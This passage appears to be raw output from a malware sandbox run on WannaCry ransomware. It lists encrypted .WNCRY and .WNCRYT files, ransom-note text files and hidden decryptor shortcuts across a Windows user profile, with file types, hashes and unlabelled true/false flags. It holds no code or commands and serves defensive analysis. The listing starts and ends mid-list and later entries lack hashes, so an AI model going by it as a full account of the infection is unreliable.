  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRY (copy)
  • Type:
  • MD5: 5F90B89E160457EA5AE6FF6D8B6DF2B1
  • SHA: 1FF67A18F7A2E4F4CA71789087E513EE7E618825
  • SHA-256: 20025AD459C45D39556E56CE0F5DE7E21E9F48A6987EEA63A26F14A8DEED5585
  • SHA-512: A1913A879E8679241672072202DB69DFEA7579B4E6CB5DE4508BA054FDCBC0B9FDBEB309B9B5C56DFB86BFD620E7FD595690DAF74B41B8A01F90C099A3127163
false
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRY (copy)
  • Type:
  • MD5: 15860AA73AB9F6C7C7BBFB741D3E4B1A
  • SHA: FF20BA5B6EAE9669E6E671BAC13E83CED9B06E83
  • SHA-256: 1ABA72A51E54F08BA6731AD1957834D61E229D322A65A8411229D1870B3ECF27
  • SHA-512: 383307B5DED1764BB07FFF2A152018B0BDE050EA221FEAAA3DF4B8797F31B155AF233042D09F61F2972489D060F0BB05C2D67DC93543F59F17F4B2890BC09883
false
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7A2726BB6E6A79FB1D092B7F2B688AF0
  • SHA: B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
  • SHA-256: 840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
  • SHA-512: 4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
false
C:\Users\Public\Pictures\Sample Pictures\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 16:54:39 2017, mtime=Fri May 12 16:54:39 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
  • MD5: 380FE084AD836A4DCDD236D4695FB370
  • SHA: 1C78147AB1FB2257E8D5D9B7A722EBBD4C40F0A3
  • SHA-256: 660BA89414429CA08516C9C95C3C7A02EDA12BC73434CD8AA8AD844039C9B568
  • SHA-512: 318DD4F9F442D0A45A1D19CCA2E986BB6A67B38437D65AE9599C3C79C82DEDD899F369F8B6A9614C96AB23D8D204F57E7891D506895E50D60F80C2A1B0EDB697
true
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRY (copy)
  • Type:
  • MD5: 3F76323DCD6A87AB514DEE519F7C39D7
  • SHA: 4C27CE2C292BA880C23D836B4B9B04B0A8389DA2
  • SHA-256: 540F807C629A88B35F1C4DBF0C862A627ED8E911B3417C1632FA9D3028BA0A0D
  • SHA-512: C9B237F0294A7E0E744EB77A875B3C51D0B79A511E2B65FE3E7D168167D7B74E0A0F8EBE313519CEAFB7F58181F6E08FAAFE2297429EF6E635138C66C1AF121B
false
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRY (copy)
  • Type:
  • MD5: BAA678847ABCDF22E66D003B49E1DC1D
  • SHA: 39479981C7433E2CDBB0A522DADDBC251CF22318
  • SHA-256: 4C51412063D723ABAA80CF8001A0A71727007B9ED9576B762932F3C7F1F0CDC8
  • SHA-512: EBF2A832D1ECA4DD150667EF30382C80CB5D9930E0F6E348554F2B70CE98D2028CBA0857685941DD6CF11E69E3E64EA6284B36B05B5C7E7BE662033119641F17
false
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRY (copy)
  • Type:
  • MD5: E16C912DF31D5F7252893C658F7ED6C6
  • SHA: E4BC95428D8CF92EDB796822D6B985F749F4B9A1
  • SHA-256: 351416292CB263CC23D42E54B09A0AAD691D7223746AE0F6B624A1E8BBCF0720
  • SHA-512: 2E54AE20503D5963962BC2CB6097237AAAEE0D31A04D7BDCB4443F42AF95BB5A0354CFE568F50B88D40BCF5DE4D5DFF5339C612294ECD6B9131DFE1897C15314
false
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRY (copy)
  • Type:
  • MD5: 8675B6701547C1D2FFAA7CC5125A860C
  • SHA: 62D580ED442B907302F9597456B9EBA9F981F338
  • SHA-256: 1F48F23070D41FCE590B5B86856A0867BACBC36FD8FD1602849188F658FCB0AF
  • SHA-512: 220F62ACF56C3CBAE698FC0681B1DB74DEAD8E8DEC7126457FA2C919B4406F6E60852632A232F326860A1E8FC90ED4D25ED4335D315520D8008B7C184EE8CE83
false
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRY (copy)
  • Type:
  • MD5: 6D54DBDFF109A8FB929DBCCE2BA43D2F
  • SHA: C3B8F5D3ECDD795B80820B78F503055C861205E8
  • SHA-256: 048F951C15165867170CE28A60433136F567F0426C208249EBDAD09D06E8C0D2
  • SHA-512: F7FDE663339B331FB3E602A2322E2D962C513F39BB6F4824119CBF02A8EA0199D552EDE70648C802F3A8168FE683176E0E7F97D95A9137D40AF6555A729CC2BC
false
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRY (copy)
  • Type:
  • MD5: 0A8AAC33BC13FD3BF3B8EE48E938492A
  • SHA: DEC9A4EDFA28C7DFF796939DDB2E17D25A029FE3
  • SHA-256: E8BA66FB08F678A5F497A0B47298C21AF58B08D46A94ACFAE8F68A9021F3F6F6
  • SHA-512: 4CF3607D07C68DCE70E9DB7AE0B6C1FC843EC915C98D9F2673002FC38A90CDFA42D4E314ABBE53C4D71AAE57CE383A8CF84F5A7A99CB2C0E114ABB500920F3D4
false
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRY (copy)
  • Type:
false
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRYT
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRY (copy)
  • Type:
false
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRYT
  • Type: data
false
C:\Users\Public\Videos\Sample Videos\@Please_Read_Me@.txt
  • Type: data
false
C:\Users\Public\Videos\Sample Videos\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 16:54:39 2017, mtime=Fri May 12 16:54:39 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
true
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRY (copy)
  • Type:
false
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\@Please_Read_Me@.txt
  • Type: data
false
C:\Users\luketaylor\AppData\Local\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 16:54:39 2017, mtime=Fri May 12 16:54:39 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
true
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\icon_128.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\icon_128.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\icon_16.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\icon_16.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\main.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\main.js.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\128.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\128.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\128.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\128.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\128.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\128.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\16.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\16.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\32.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\32.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\48.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\48.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\128.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\128.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\contentscript_bin_prod.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\contentscript_bin_prod.js.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\eventpage_bin_prod.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\eventpage_bin_prod.js.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\page_embed_script.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\page_embed_script.js.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\craw_background.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\craw_background.js.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\craw_window.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\craw_window.js.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\flapper.gif.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\flapper.gif.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\icon_128.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\icon_128.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\icon_16.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\icon_16.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\topbar_floating_button.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\topbar_floating_button.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\topbar_floating_button_close.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\topbar_floating_button_close.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\topbar_floating_button_hover.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\topbar_floating_button_hover.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\topbar_floating_button_maximize.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\topbar_floating_button_maximize.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\topbar_floating_button_pressed.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\topbar_floating_button_pressed.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\128.png.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\128.png.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\angular.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\angular.js.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\background_script.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\background_script.js.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cast_game_sender.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cast_game_sender.js.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cast_route_details.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cast_route_details.js.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cast_sender.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cast_sender.js.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cast_setup\cast_app.js.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cast_setup\cast_app.js.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cast_setup\cast_app_redirect.js.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cast_setup\cast_app_redirect.js.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cast_setup\chromecast_logo_grey.png.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cast_setup\chromecast_logo_grey.png.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cloud_route_details\view.js.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\cloud_route_details\view.js.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\common.js.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\common.js.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\feedback_script.js.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\feedback_script.js.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\mirroring_common.js.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\mirroring_common.js.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\mirroring_hangouts.js.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5516.1005.0.3_0\mirroring_hangouts.js.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\IconCache.db.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\IconCache.db.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Cave_Drawings.gif.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Cave_Drawings.gif.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Connectivity.gif.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Connectivity.gif.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.WNCRY (copy)
  • Type:
